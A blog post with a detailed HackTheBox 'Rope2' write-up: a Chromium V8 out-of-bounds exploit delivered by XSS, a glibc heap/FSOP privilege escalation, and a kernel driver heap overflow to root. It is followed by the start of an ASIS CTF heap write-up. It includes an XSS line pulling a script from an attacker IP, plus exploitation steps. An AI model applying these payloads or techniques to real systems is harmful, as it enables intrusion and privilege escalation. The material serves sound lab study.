Saturday, January 16, 2021

Rope2 HackTheBox Writeup (Chromium V8, FSOP + glibc heap, Linux Kernel heap pwnable)

Rope2 by R4J has been my favorite box on HackTheBox by far. It wasn't really related to pentesting, but was an immersive exploit dev experience, which is my favorite subject. To sum it up, this box was composed of a V8 Chromium pwnable and a difficult glibc heap (with FSOP) pwn for user, and then a heap pwn on a vulnerable kernel driver on Ubuntu 19.04. In the end, I also did end up taking second intended user and root blood, with both first intended bloods being claimed by Sampriti of course; macz also ended up taking third intended blood.

Before I start, I would like to acknowledge Hexabeast, who worked with me on the v8 pwnable. I would also like to thank Sampriti and my teammate cfaeb1d for briefly discussing the user pwnable with me.

Initial enumeration is straightforward. An nmap scan shows ports 22, 5000, and 8000 open. Port 5000 hosts a GitLab instance, and exploring around (http://rope2.htb:5000/explore/projects/starred) reveals Chromium source code with a patch by the challenge author. Use the GitLab website to download the source code at its current commit: http://ropetwo.htb:5000/root/v8/commit/7410f6809dd33e317f11f39ceaebaba9a88ea970

On port 8000, there is a website that allows us to submit a contact form. Since the GitLab instance makes it clear that this is a V8 pwnable, XSS would be an obvious vector. Testing something like <script src=http://10.10.14.9/exploit.js></script> showed a response on my local SimpleHTTPServer. Clearly, our path is to write JavaScript that exploits the browser pwnable to gain RCE, and to deliver it through the XSS.

Finding the bug is extremely easy. Take a look at the changed files in commit history. We notice that several files are changed, but the one that actually matters is builtin-arrays.cc. The other files were modified to properly introduce and incorporate the new function added in builtin-arrays.cc. 

ArrayGetLastElement returns the value of the array at array[len], which is an OOB read. ArraySetLastElement expects two arguments. The first argument will be the “this” argument and the second argument is the value that the element at array[len] will be set to. This is an obvious OOB write. This seems quite similar to Faith's famous *CTF OOB writeup. One important thing to note here is that in December 2019, the V8 team introduced pointer compression to the V8 heap. Basically, it's a pretty smart memory saving decision; rather than storing 64 bit pointers on the heap, most of the pointers will be treated as 32 bit (with only the bottom half of the qword stored), while the upper 32 bits (also known as the isolate root) are stored in the r13 register.

As mentioned earlier, the other files were just modified to support the addition of this new function for builtin arrays in V8.


typer.cc and bootstrapper.cc tell us that we can access these functions on builtin arrays as GetLastElement and SetLastElement.

For some reason, only the compiled Chromium was provided. There was neither a d8 release nor a d8 debug binary. The repo was also missing certain Chromium build scripts as well; however, once everything is fixed correctly, the build instructions Faith provided regarding Chromium Depot tools, gclient, v8gen.py, and ninja should suffice for both release and debug. To avoid dependency hell, I ended up rolling out an 18.04 docker to deal with the compilation (check out a commit near the date of the gitlab commit before the vulnerable patch, and then add the patch back in; I know some of my other teammates also managed to build it by slowly fixing the missing dependencies).

Before I start, I highly recommend you to check out Faith's writeup or the famous Phrack paper, as those were the sources I relied heavily upon (my exploit is also very closely based upon Faith's). I'm still quite new to V8, so their explanations will probably be better, but the following is a summary of some important concepts I learned for personal notes.

In V8 heap, there are three main types: smi, pointers, and doubles. Doubles are 64 bits, pointers are compressed to 32 bits (and tagged), and smi are 32 bits as well (with their values doubled to differentiate them from pointers). There are also several important components to an object on the V8 heap (which you can see by running debug d8 with --allow-natives-syntax option).  One should also note that Chromium uses a different allocator known as PartitionAlloc for most things, instead of glibc's allocator (which d8 uses).
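
As a rough sketch of the tagging scheme described above (my own simplified model in Python, not V8 code; the isolate root value in the usage note is made up), a 32 bit slot can be classified and decoded like this:

```python
# Simplified model of 32-bit tagged values under pointer compression.
# Assumption: smis are stored shifted left by one (low bit 0), heap pointers
# have their low bit set, and decompression just re-attaches the upper 32 bits.

def encode_smi(value):
    """Store a small integer doubled, truncated to 32 bits."""
    return (value << 1) & 0xFFFFFFFF

def decode_smi(raw):
    """Undo the doubling, treating the 32-bit slot as signed."""
    if raw & 0x80000000:
        raw -= 1 << 32
    return raw >> 1

def is_heap_pointer(raw):
    """Tagged heap pointers have the low bit set; smis do not."""
    return raw & 1 == 1

def decompress(isolate_root, compressed):
    """Rebuild a full 64-bit tagged pointer from the isolate root and a 32-bit slot."""
    return (isolate_root & ~0xFFFFFFFF) | compressed
```

For example, with a hypothetical isolate root of 0x123400000000, the compressed slot 0x0808cad9 would decompress to 0x12340808cad9, while a slot holding 4 is simply the smi 2.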

For every V8 object, there are several important pieces of data. Map is the most important; it is a pointer to data that contains type information. According to Phrack, data such as object size, element types, and prototype pointer is stored in the Map. The following is a list of element types (V8 currently has 21), but V8 mainly uses SMI_ELEMENTS, DOUBLE_ELEMENTS, and ELEMENTS (with each of them having the more efficient PACKED form and the more expensive HOLEY form). Another important piece of information is the elements (and properties) pointer, which points to a region that contains a pointer to another Map, a capacity size, and then the data/pointers indexed. Array objects also have an additional length field (lengths are represented as an smi).

Here is some sample output as an example for some of the terminology above (you can see how the fields are ordered from the debugging view as well):


Interesting to see how the double array's elements are usually above the object, which starts with the map field here... perhaps we can use the OOB to create some type confusion, as you will see later.

There are a few more important V8 exploitation concepts before we begin. In browser pwning, there are two basic types of primitives: addrof and fakeobj. Retrieving the address of an object is known as addrof. As Faith discusses, this can easily be done if you just create a type confusion of an object array into a double array, so its elements, which are pointers, get outputted as doubles. The other main type of primitive is the fakeobj primitive, where, as the name implies, we fake objects in memory. As Faith discusses again, this can be achieved by just creating another type confusion of a double array into an object array, and writing pointers into the elements.

Using these two primitives, one can achieve arbitrary reads and writes. For arbitrary reads, we can make a double array where the first element contains a double array map, and then create a fake object over that field (making it think it's a double array). We can now manipulate the index which acts as the element pointer to be a valid address, and have it read its content from there by indexing into our fake object. Using this same concept, we can achieve an arbitrary write.

At this point, with all 4 of these primitives, we have enough to gain arbitrary code exec. Normally, Chromium runs under a sandbox that makes “arbitrary” not exactly true, but we don't have to worry about it here as it is disabled. The standard way in V8 exploitation is to use WASM instances. When you initialize a WebAssembly Instance, a new rwx page is mmap'd into V8 memory. Since this instance is also an object, you can leak its address. At the Instance + 0x68, the rwx page address is stored in its 64 bit entirety, so you can use arbitrary read to read it out. Then you can write your own shellcode into the rwx region. Calling your exported Web Assembly function will now execute such shellcode. One might wonder why such an advanced software would be using rwx page. Apparently, V8 devs pinpoint the issue on asm.js, which requires lazy compilation into Web Assembly, and the constant permission flips impact performance a lot.

However, how can you write into 64 bit addresses outside of the V8 heap when there is pointer compression and you can't control the isolate root? Basically, an ArrayBuffer's backing store pointer is still stored as a full 64 bit value, as it references a region outside the V8 heap (since the backing store is allocated by ArrayBuffer::Allocator), as you can see in the image below.


If you change the backing store, you can now write to that arbitrary 64 bit address location (like in your WASM instance) with a DataView object initialized over your ArrayBuffer, since ArrayBuffers are low level raw binary buffers and only DataView (user specified types for values) or TypedArrays (uniform value access) can be used to interface with their contents. You can also perhaps find a stable way to leak a libc address, as they do exist in the V8 heap (and the V8 heap behaves predictably), and then choose to overwrite a hook function with another function or a stack pivot; do note that this approach would be more reliable inside d8 (since it uses glibc's allocator) than Chromium (which primarily relies on PartitionAlloc, but I believe glibc's allocator is still occasionally utilized).

Anyways, after the crash course above, let's begin discussing this exploit. Due to pointer compression, the OOB won't exactly be as easy as the one from *CTF (OOB behavior for double arrays will still behave the same). Notice how in the patch, builtin arrays are forcefully typecasted as 64 bit FixedDoubleArrays. If you have an array of objects, this forced typecasting groups 2 object pointers together as one double value each time while also retaining the same original length (but it'll also be indexed as a double array). For example, if you have an object array of size 2, typecasting this into a FixedDoubleArray makes it a FixedDoubleArray of size 2, which is equivalent to an object array of size 4, so indexing won't behave the same. If your object array is of size n, the OOB will access size n+1 from the FixedDoubleArray, which will be treated as the 2n+1 object array index.

For example, if I declare a size 2 array of objects called temp, the following behavior occurs:

convertToHex(ftoi64(temp.GetLastElement())) outputs 0x40808cad9
Running temp.SetLastElement(itof(0x13371337n)) causes the following behavior:
This won't allow for a direct map overwrite and type confusion, so we just have to take a longer route around it. For addrof, you can start off by creating an object array of size 1, and an object array of size 2 (that contains your target objects). You should also grab some other double array's map, and the second array's elements pointer with the OOB read. This way, when we perform an OOB write on the first object array, it will hit the real index (in terms of 32 bit compressed object pointers) of 3 from its starting index, which would overwrite both its own properties and elements pointer. We can replace its elements pointer with the elements pointer of the second array, and just wipe out the properties pointer since it won't matter for arrays that much. Now, when we try to OOB write on the first array, it will still see it as size of 1 double (effectively 2 object pointers due to typecasting), but use the elements of the second array. Since an effective size of 2 object elements is the correct size for this size 2 object array, we will hit the second array's map and properties. Properties once again doesn't matter, and you can just replace the map with the leaked double map from the OOB read. Now indexing into this second array will leak the target object's address.
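
The slot arithmetic behind both the size 2 example and the addrof setup can be sketched in a few lines of Python. This is only a model under an assumed layout (4 byte compressed slots, with the JSArray's map, properties, elements, and length fields sitting directly after its element slots); the helper names are mine:

```python
# Assumed layout, in 4-byte compressed slots counted from the first element:
# [elem0 .. elem(n-1)] followed directly by the JSArray fields below.
JSARRAY_FIELDS = ["map", "properties", "elements", "length"]

def slots_hit(double_index):
    """A 64-bit access at double index i covers compressed slots 2i and 2i+1."""
    return (2 * double_index, 2 * double_index + 1)

def describe(n_elements, double_index):
    """Name what each covered slot holds for an object array with n_elements slots."""
    names = []
    for slot in slots_hit(double_index):
        if slot < n_elements:
            names.append("element[%d]" % slot)
        else:
            field = slot - n_elements
            names.append(JSARRAY_FIELDS[field] if field < len(JSARRAY_FIELDS) else "beyond JSArray")
    return names

def split_double_bits(raw):
    """Split a leaked 64-bit value into its (low, high) 32-bit halves."""
    return raw & 0xFFFFFFFF, raw >> 32
```

Under this model, describe(1, 1) gives properties and elements (the first array's OOB write), describe(2, 1) gives map and properties (the write once the first array borrows the second array's elements), and describe(2, 2) gives elements and length. The last case is consistent with the 0x40808cad9 value above: the low half 0x0808cad9 looks like a compressed elements pointer and the high half 0x4 is the smi encoding of length 2.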

The same concept is applied to fakeobj. However, this time we aren't changing the map of the second larger object array. Rather, we want to grab its map's value. Once we have that, we can perform a normal OOB write on the float array to change its map to an object array's map, and retrieve fake objects. Here is my implementation:


Arbitrary read and write were already explained above. In this case, due to pointer compression, we need to set both a valid address for elements as well as the size (just choose any valid smi that's greater than or equal to size 1). I also subtracted another 0x8 from the address for the elements location, since pointer compression puts both the element's map and size in one single qword. Properties once again doesn't really matter, but the double array OOB leak handled it for us regardless so I just left it as that. As a setup for my WASM Instance, I just used Faith's implementation; due to pointer compression again, you will need to adjust for the offset of the backing store pointer. Here is the implementation so far.


And then we just need to trigger a WASM rwx page allocation, overwrite its code, and then execute the exported function. For my shellcode, I just chose a generic shellstorm x86_64 Linux reverse shell shellcode.

Here is my final exploit (note that it isn't 100% reliable, probably due to some advanced garbage collector behavior or some other V8 internals that I don't understand):


Now we popped a shell as chrome user. 

From a quick look at /etc/passwd, we know the user flag will be in r4j's home directory. Basic enumeration shows a suid binary from r4j called rshell. We can utilize this to escalate our privileges.

At this point during the release, only 3 players had popped a shell, and all of us were working towards user. This is when the A Team, per tradition, found an unintended route, and took first blood. Between the time this box was submitted and its release, 19.04 went EOL and was not patched, making it vulnerable to CVE-2020-8831. Basically, Apport will use the existing /var/lock/apport directory and create the lock file with world writeable permissions. Since Apport is enabled by default in modern Ubuntu, we just need to run a binary that purposely crashes. I know R4J and the A Team, for their example, crashed a binary named “fault” and then used the symlink to write a bash script into /etc/update-motd.d for privilege escalation (which will then be run as root on the next ssh connection):


 Apparently several other boxes were vulnerable to the same bug... 

For the sake of debugging (and since this is usually fine for many offsets), I patchelf'd the binary with the correct linker and libc, and re-merged debugging symbols into the library so I can properly debug with pwndbg.

Reversing the binary comes up with the following pseudocode:


Note that there is NX, Full RELRO, Canary, and PIE, and the libc version is 2.29. Basically, there is a file struct that holds the filename as a char array and the contents via a pointer. You only have 2 file spots, and you cannot have the same filenames (adding, removing, and editing are all done selectively by the filename). One issue is that there doesn't seem to be a good way to leak purely through the heap (the ls option only shows filenames, and nothing prints out file contents). Adding is quite safe (no overflows and etc.). Deleting is also safe, as the content pointer is nulled out. Edit also seems safe at first glance, but we must consider the behavior of realloc(). According to glibc source, realloc is as the following (__libc_realloc calls _int_realloc):


If the older chunk size is larger or equal to the requested chunk size, the chunk at that same memory location remains the same and it will attempt to split it. If it's large enough to be split into its own chunk, it'll get set up properly for it to be freed. Nothing would happen if you request a realloc() of the same size. By __libc_realloc, if the requested size is 0, then it just frees it and returns 0 (but that 0 is stored in a temporary value and by the program logic, won't replace the file content pointer).

If the older chunk size is smaller than the requested chunk size, it will first attempt to extend the current chunk into the top chunk. If it's not adjacent to wilderness, it will also try to extend to the next free chunk if possible and then deal with the split for remainder later (as when the older chunk size is larger or equal to the requested chunk size). Its last choice is to just allocate, memcpy, and then free the old chunk. Note that _int_malloc is used in this case, and like calloc, the code path taken in that function will not allocate from tcache to my knowledge. 

The edit function only checks that the size is less than or equal to 0x70. If we tell it to realloc with a size of 0, we basically turn the edit into a free. Since nothing checks for that case (and the pointer remains in place), we can use this to emulate a double free; this is the central bug.

But how can we grab a leak? Well, when analyzing libc offsets, we notice that _IO_2_1_stdout_ and main arena only differ in the last 2 bytes. We will always know the last 12 bits due to ASLR behavior, and there are only 4 bits we do not know. If we attack this file structure correctly, we can have every puts call print out large sections of the libc itself during runtime. Therefore, with a 4 bit bruteforce (1/16 rate of success), we might be able to redirect a heap chunk to that file structure, modify it, and dump portions of runtime addresses.
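
To make the 4 bit guess concrete, here is a small Python sketch of the 2 byte partial overwrite. The pointer value and the 0x760 page offset are illustrative assumptions of mine, not values taken from the target:

```python
import struct

def partial_overwrite(original_ptr, target_low12, guess_nibble):
    """Replace the low 2 bytes of a pointer: 12 known bits plus one guessed nibble."""
    low16 = (guess_nibble << 12) | target_low12
    return (original_ptr & ~0xFFFF) | low16

def low_two_bytes(target_low12, guess_nibble):
    """The 2 bytes actually written over the existing fd, in little-endian order."""
    return struct.pack("<H", (guess_nibble << 12) | target_low12)

def success_rate():
    """Only one of the 16 possible nibble values matches the randomized bits."""
    return 1 / 16
```

For instance, if a main arena pointer such as 0x7f1234be4ca0 is already sitting in the fd field, writing the two bytes for a guessed nibble of 5 turns it into 0x7f1234be5760, which only lands on the stdout structure when ASLR happened to pick that nibble.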

This is actually a really common technique, as detailed in HITCON baby tcache challenge. The linked writeup gives a much better explanation, but the gist is that puts calls _IO_new_file_xsputn, which will call _IO_new_file_overflow. Page 16 of the famous AngelBoy FSOP paper also discusses this technique.


Our end goal is to have this file structure path end up at _IO_SYSWRITE in _IO_do_write. To hit _IO_do_write, we just need to skip the first two conditionals, and have our ch argument be EOF. The second argument is already set correctly from the call from _IO_new_file_xsputn. To skip the first two conditions, we need to make sure to set the _IO_CURRENTLY_PUTTING flag and unset the _IO_NO_WRITES flag in the _flags field of the file structure. The following is _IO_do_write:


To hit _IO_SYSWRITE, we want to set the _IO_IS_APPENDING flag in the file structure _flags field and make read_end different from write_base; this way, it won't take the lseek syscall path and return. Now, the _IO_SYSWRITE syscall writes (f->_IO_write_ptr - f->_IO_write_base) bytes starting from f->_IO_write_base.

To summarize, based on libio.h, we can set the flags as the following: (_IO_MAGIC | _IO_IS_APPENDING | _IO_CURRENTLY_PUTTING) & ~_IO_NO_WRITES. The value for the _flags field should therefore be 0xfbad1800. The read field values won't really matter, so just set read_ptr, read_end, and read_base to null. And now, we can use a single byte to tamper with write_base, and hence have the write syscall dump memory for us.

I will now discuss the exploit itself below. A really high level of understanding of the glibc heap behavior is a must know before reading. A lot of what I do is based on heap intuition and heap feng shui as the 2 chunk limit makes this extremely tough (in fact, after you leak, you will see that you only have one chunk left to use if you don't want the program to crash).

The first thing I did was store some chunks into the 0x60 and 0x80 tcachebins for usage after the leak. This is for when I corrupt the unsorted bin, I can still get valid chunks back. I then allocated a 0x40 user sized tcache chunk, filled it with 0x71 (for fake size metadata for later, this same technique will be applied later on to beat the many size checks in glibc), and then freed it (note that in my code, fakeedit basically just performs the edit with size 0).


Here is the current heap state:

Then I started using the 0x70 tcache chunk; I used the realloc size of 0 to double free and fill the tcache (note that we must wipe the key entry of each chunk to bypass the 2.29 tcache double free mitigation). Then I started pulling back from the 0x60 user sized tcache, and changed the fd pointer to redirect me into the region of 0x......370 later on in the diagram above.



On my next allocation from the 0x70 tcache, I will still have the original location. Due to the original successive double frees, the two chunks will be at the same location. I then use realloc behavior to split the second chunk into a 0x50 and 0x20 real sized chunk (0x20 chunk will be sent into tcache). I then fake edited the 0x50 chunk, then split the chunk into 0x20 and 0x30 sizes (with the 0x30 being sent into the tcache), and then freed the 0x20 size chunk. What's the purpose of this complex chain of events? Well, it is for me to corrupt the tcache bins so that multiple different tcache freelists have pointers to the same memory location. At this point, my first file content also points to this 0x......370  location.



Remember now, that our current file content (size of 0x70), and the first item on the freelist for the 0x20 and 0x50 tcache freelist all point to the same location. I then allocated a chunk (for the second filename) from the 0x70 tcache bin to change the size of current file content at 0x......390  to 0x91 (so once we fill the tcache of 0x90, we can get unsorted chunks instead of fast chunks). Note that you have to continually change the key structure in the “0x90” sized chunk to bypass the tcache double free mitigation, which I performed from the chunk allocated above as edit restricts us to not go over size of 0x70. 



Now we can overlap tcache bins with unsorted bins, and use a tcache bin with a 4 bit (1/16) brute force to write onto the _IO_2_1_stdout_ file structure. Here is where having tcache bins of different sizes point to the same location becomes useful. If we just double freed the same chunk, then we can't exactly retrieve the redirected chunk, since you can allocate and modify fd for the first file content spot, and then you need two more allocations to get back the target location (and that wouldn't be possible with realloc, free, and only 2 spots). Now, with my setup, I can use one of the tcache chunks (0x20) from one of the sizes to modify 2 bytes of the fd (with only the upper 4 bits being guessed), allocate once from the 0x50 chunk, then free the 0x20 chunk, and replace that spot with a 0x50 sized allocation, giving us control over the _IO_2_1_stdout_ file structure. Now, when puts runs again, we should get a massive dump of data. Note that from this point on, my addresses will be different since I believe this technique is somewhat ASLR dependent, and using the non-ASLR addresses as the brute only worked locally. The code below will be the one adjusted for remote work, while the image will show the original local one without ASLR.



However, as a consequence of this leaking mechanism, there is no good metadata for us to use for the size field, and subsequent frees on this chunk will fail. This means we only have one chunk left to obtain RCE.

Our end goal should be to redirect a chunk into __free_hook to pop a shell. How do we do this with only 1 chunk remaining? After a bit of cleanup, I pulled from the previously saved 0x80 chunk (as unsorted bin is now corrupted). I then fake edited it, and then split it into an active 0x20 chunk and a freed 0x60 chunk. I then freed this 0x20 chunk so I can get another allocation from the previously freed 0x80 chunk. Using this, I can change the fd of the 0x60 chunk to __free_hook - 8.



After this point, we can free our chunk once again to get space for a new allocation. I can get the location of __free_hook - 8 back by allocating from the 0x60 tcache once, splitting it, freeing it, and then allocating from it again. Then we just overwrite it with /bin/sh\x00 followed by the address of system, and a subsequent free call will pop a shell.
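
The final write is small enough to spell out. Below is a minimal Python sketch of the 16 bytes placed at __free_hook - 8; the libc base and the system offset in the usage note are placeholders of mine, not the real values:

```python
import struct

def free_hook_payload(system_addr):
    """Bytes for the chunk at __free_hook - 8: the command string, then the hook value."""
    return b"/bin/sh\x00" + struct.pack("<Q", system_addr)

def resolve(libc_base, symbol_offset):
    """Turn a leaked libc base and a symbol offset into a runtime address."""
    return libc_base + symbol_offset
```

With a hypothetical base of 0x7f0000000000 and a hypothetical system offset of 0x52000, the first 8 bytes hold the string and the next 8 land exactly on __free_hook. Freeing that same chunk then calls system with a pointer to the start of the chunk, which is the /bin/sh string.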

Here is the final remote exploit:


Finally, we pop shell as R4J (remote 1/16 takes a few minutes):

However, we still weren't able to read the flag. It turns out that our group permissions were incorrect as we were still chromeuser group, but this is relatively trivial. newgrp - r4j will change our gid correctly, and we can grab the user flag.

Due to the nature of the box, I was 99% sure root was going to be a kernel pwn. Running dmesg showed us the following messages:
run dmesg
[   20.879368] ralloc: loading out-of-tree module taints kernel.
[   20.879407] ralloc: module verification failed: signature and/or required key missing - tainting kernel

This will probably be the vulnerable driver. Looking in /dev, there was a ralloc device loaded. The driver itself was located at /lib/modules/5.0.0-38-generic/kernel/drivers/ralloc/ralloc.ko. We can transfer that out and begin reversing. One thing to note is the current protections. From /proc/cpuinfo, we know SMEP is enabled, but surprisingly, R4J was very nice to disable KPTI and SMAP (although KPTI was originally enabled during testing, perhaps HackTheBox was running their servers on AMD Epyc and the whole issue KPTI was designed to address, Meltdown, wasn't an issue for AMD). KASLR will obviously be enabled, but check /proc/cmdline to be absolutely sure.
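
A check like this can be scripted. The following Python sketch assumes the mitigations show up as the smep, smap, and pti entries on the flags line of /proc/cpuinfo, and that KASLR is only off when nokaslr appears on the kernel command line; the function names are mine:

```python
def cpu_mitigations(cpuinfo_text):
    """Report which of smep/smap/pti appear in the cpuinfo flags lines."""
    flags = set()
    for line in cpuinfo_text.splitlines():
        if line.startswith("flags"):
            flags.update(line.split(":", 1)[1].split())
    return {name: name in flags for name in ("smep", "smap", "pti")}

def kaslr_disabled(cmdline_text):
    """KASLR is assumed on unless 'nokaslr' is passed at boot."""
    return "nokaslr" in cmdline_text.split()

if __name__ == "__main__":
    # On a live Linux system, feed the real files in.
    with open("/proc/cpuinfo") as f:
        print(cpu_mitigations(f.read()))
    with open("/proc/cmdline") as f:
        print("nokaslr set:", kaslr_disabled(f.read()))
```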

Reversing the kernel module comes up with the following pseudocode:


The bug is pretty clear here. When allocating from the ralloc ioctl, the size recorded in the global array for each entry is the requested size plus 0x20. This way, when you edit, you have a large kernel heap overflow. Deleting and reading are safe.

In order to even be able to debug this pwn efficiently, I had to use qemu so I could integrate it with peda remote debugging. I also had to enable kvm, so I wouldn't be stuck waiting 5 minutes for it to even boot. To set this up, I downloaded the 19.04 Ubuntu Server image and ensured the kernel version was the same (5.0.0-38 from enumeration). I then set up an image drive specifically for an install with the following commands:

qemu-img create -f qcow2 ralloc.qcow2 6G
qemu-system-x86_64 -hda ralloc.qcow2 -boot d -cdrom ./19.04.iso -m 2048 -nographic -enable-kvm

Then, to boot this kernel, I had to set the following flags:


I also added “console=ttyS0 loglevel=3 oops=panic panic=1 kaslr” into /etc/default/grub, ran update-grub, loaded ralloc.ko into “/lib/modules/`uname -r`/kernel/drivers/ralloc”, ran depmod, and then rebooted. We should now have a proper qemu debugging environment onto which we can hook peda. It would also be helpful to retrieve the System.map file as well as vmlinuz.

With the size limitations above, the tty_struct from the kmalloc-1024 slab is perfect for this usage; it can give both a KASLR leak via ptm_unix98_ops and rip control with its pointer to the tty_operations struct, from which we can control the ioctl function pointer. Before discussing the exploit, I would like to briefly discuss some protections in standard Linux distro kernels (which are often compiled out for CTF kernel challenges). As this post from infosectbr mentions, freelist pointers are hardened in the following manner: ((unsigned long)ptr ^ s->random ^ ptr_addr). If we can get a heap leak, we can still perform freelist poisoning. Even if we don't get a heap leak, there is a chance to overwrite and corrupt it with only an 8 byte overflow to get it to redirect properly (as the article mentions), but a heap spray is necessary. It's just easier to rely on useful kernel structures (plus, there were even more pointer hardening options added soon afterwards in later kernel versions). Another hardening option is freelist randomization, which, as the name implies, randomizes the freelist. This means our heap operations won't be predictable like in glibc, so a heap spray will be necessary.
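
To show why a heap leak is enough to defeat that hardening, here is a short Python model of the XOR scheme quoted above. All addresses and the secret are made-up values, and the function names are mine:

```python
MASK64 = (1 << 64) - 1

def harden(ptr, random, ptr_addr):
    """Stored freelist value: ptr ^ s->random ^ ptr_addr (XOR is its own inverse)."""
    return (ptr ^ random ^ ptr_addr) & MASK64

def recover_random(stored, ptr, ptr_addr):
    """With the real next pointer and the slot address known, the secret falls out."""
    return (stored ^ ptr ^ ptr_addr) & MASK64

def forge(target, random, ptr_addr):
    """Value to write into the slot so the allocator later decodes it to target."""
    return harden(target, random, ptr_addr)
```

In other words, once an attacker knows where a free object lives and what it really points to, a single observed stored value reveals s->random for that cache, and any target address can then be encoded for a poisoned freelist entry.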

One of the first things in my kernel exploit are the helper functions and structs. I made the following:


As mentioned earlier, we will be relying on the tty_struct structure, which gets allocated whenever we open /dev/ptmx. According to source, the struct is as the following:


Therefore, the 4th qword of this holds the tty_operations struct pointer, which for ptmx devices will contain the address of ptm_unix98_ops. According to the Ubuntu System.map file, that address will have its lower 12 bits be 6a0; this will come in handy for the heap spray. From the source, the following is the tty_operations struct:


Hijacking the ioctl function pointer seems like a good idea, as it would trigger when we run ioctl with that fd. 

For the spray, my plan was to just allocate a bunch of ptmx devices, and then loop through the array of 32 spots to allocate a ralloc chunk. After each allocation, I would check if it is adjacent to a ptmx device by performing an OOB read to see if there is a ptm_unix98_ops address (we have just enough of an OOB amount to hit that field of the structure). If that is the correct one, I will just return that index. Here is my implementation:
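
The adjacency check itself boils down to scanning the over-read bytes for a qword that looks like ptm_unix98_ops. Here is a Python sketch of that test; the offset used for rebasing is a placeholder that would have to be looked up in System.map, and the sample addresses in the usage note are invented:

```python
import struct

# Placeholder offset of ptm_unix98_ops from the kernel base (hypothetical value).
PTM_UNIX98_OPS_OFFSET = 0x10AF6A0

def find_ops_leak(oob_bytes, low12=0x6A0):
    """Return (offset, value) of the first qword that looks like ptm_unix98_ops."""
    for off in range(0, len(oob_bytes) - 7, 8):
        (qword,) = struct.unpack_from("<Q", oob_bytes, off)
        in_kernel_image = (qword >> 32) == 0xFFFFFFFF
        if in_kernel_image and (qword & 0xFFF) == low12:
            return off, qword
    return None

def kernel_base(leak, ops_offset=PTM_UNIX98_OPS_OFFSET):
    """Rebase: subtract the symbol's known offset from the leaked address."""
    return leak - ops_offset
```

If the 0x20 bytes past a ralloc chunk start with something like 0x0000000100005401 (the tty magic plus a refcount) and the 4th qword is 0xffffffff9a0af6a0, the scan returns offset 24 and the chunk is very likely sitting right before a tty_struct.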


From there, we can rebase all the necessary addresses in the kernel we need for privilege escalation to uid 0.


Now we can replace the tty_operations struct pointer with our own malicious pointer with the OOB write. Take careful note to preserve the other addresses in this struct. I also spammed my malicious tty_operations struct with pty_close to prevent other crashes (it just helps fill it with valid pointers, and crashing won't really happen since ioctl is the only operation I am planning for it). I chose a stack pivot gadget that was xchg eax, esp (since the address of the function pointer will be in the rax register when I trigger the malicious ioctl). This also allows me to determine an absolute location to make my fake stack for the rop chain.
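
The reason the pivot gives an absolute, predictable stack location is that xchg eax, esp only keeps the low 32 bits of rax, and writing a 32 bit register zero-extends into the full 64 bit register. A Python sketch of the address arithmetic follows (the gadget address in the usage note is made up, and the one page of headroom below the stack is my own choice):

```python
PAGE = 0x1000

def pivot_target(gadget_addr):
    """After xchg eax, esp with rax = gadget address, rsp is its low 32 bits."""
    return gadget_addr & 0xFFFFFFFF

def mmap_region(gadget_addr, pages=3):
    """Userland range to map so the fake stack has room below and above it."""
    fake_stack = pivot_target(gadget_addr)
    base = (fake_stack & ~(PAGE - 1)) - PAGE
    return base, pages * PAGE
```

For a hypothetical gadget at 0xffffffff8104b5e2, the rop chain would be written at 0x8104b5e2 inside a region mapped at 0x8104a000 with MAP_FIXED, which works here because SMAP is disabled and the kernel can use a userland stack.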


Here is what the corruption looks like in memory (first address is the location of the length 32 array in the driver):

As you can see, there is a userland pointer that replaced the tty_operations struct pointer.

Now what should my rop chain be like? There is only SMEP, so this should be quite trivial with a ret2usr or even without it. However, the one issue I kept running into was the inability to use certain syscalls upon the return to usermode (such as execve), and I do not enjoy having an exploit that doesn't give me an ability to pop a shell. For some reason, execve with either the iretq, sysretq, or other syscall trampolines would cause a kernel panic; maybe there is something I didn't clean up with the corruption created with the exploit, but I am not completely sure. In the end, I decided to just make my exploit make /usr/bin/dash a suid binary as root and then hang the kernel thread (for 49.7 days, which is long enough). The idea was to just run the following pseudocode:


Once we have added that rop chain into the target location after the stack pivot, we can trigger it and become root. While we don't know which ptmx fd is the adjacent chunk, we can just loop through all of them and run ioctl on each one. Note that this exploit has to be run asynchronously in bash due to the hanging.

The following is the final exploit:


And after compiling and transferring to remote... (note that you can access this driver as chromeuser as well):


Whew, and finally, we can obtain the root flag! It was a really fun journey, and definitely sparked my interest in learning more about kernel pwning (as my previous experience only involved solving kernel ROP challenges) and browser pwnables. Feel free to let me know if anything I explained is wrong or confusing (as this is quite a complex writeup), and I am 100% looking forwards to Rope3.

Acknowledgements: In addition to all the sources linked above, I would like to thank R4J, Faith, D3v17, and Overthink for giving this a read through and providing feedback to make the writeup even better.


Wednesday, December 30, 2020

Yet Another House ASIS Finals 2020 CTF Writeup

A few weeks ago, I played with DiceGang in ASIS Finals CTF. Yet Another House was one of the heap pwnables, and it had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for a controlled arbitrary write to escape seccomp for the flag. I didn't plan on making a writeup for this originally, but when redoing this complex pwnable a few weeks later, I thought it would be good for me to make some detailed notes so I don't forget about these techniques.

Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop. 

Initial Work:

One thing to note immediately is the patch the author introduced into the glibc library. 


He effectively disabled the possibility of attacking global_max_fast. 

Now, reversing this binary (all protections are enabled):

Inside initialize, a 0x20 chunk is allocated and the address of the tcache_perthread_struct is recorded. According to seccomp-tools, only open, read, write, mprotect, clock_nanosleep, rt_sigreturn, brk, exit, and exit_group were allowed. Also note that this program doesn't return, only uses read() and write(), and exits with _exit, which means our seccomp escape probably will not use FSOP. 

From the allocation function, we know that our requested sizes must be greater than 0x100 and less than or equal to 0x2000. We also have 0 to 18 slots inclusive (so 19 total). The read_data function (which I didn't show) null terminates. I would say that this function overall is safe. The malloc_wrapper function performs another important task:

Seems like it wipes the tcache_perthread_struct every time you call malloc :(


The delete function is safe and nulls out the size and chunk array indices respectively.


The leak function itself is also safe. I didn't show the code for write_1 here, but it only writes the number of bytes based on strlen(data), so if we want to use this for leaks, we have to be very careful to not introduce null bytes before the leak.


And here, we have a classic CTF heap note bug... the infamous null byte poisoning, as it writes a null byte one position past the amount read in. Note that this function can only be used once unless you reset the sanity value, but that wasn't necessary in this exploit.

The last thing to take note of is that the unsorted bin fd and bk pointers (the usual libc leak) have a null least significant byte in this libc, so in memory they start with a null byte, which will prove slightly troublesome later on.

Observations:

From the reversing above, we can conclude several things and propose a basic exploit path.

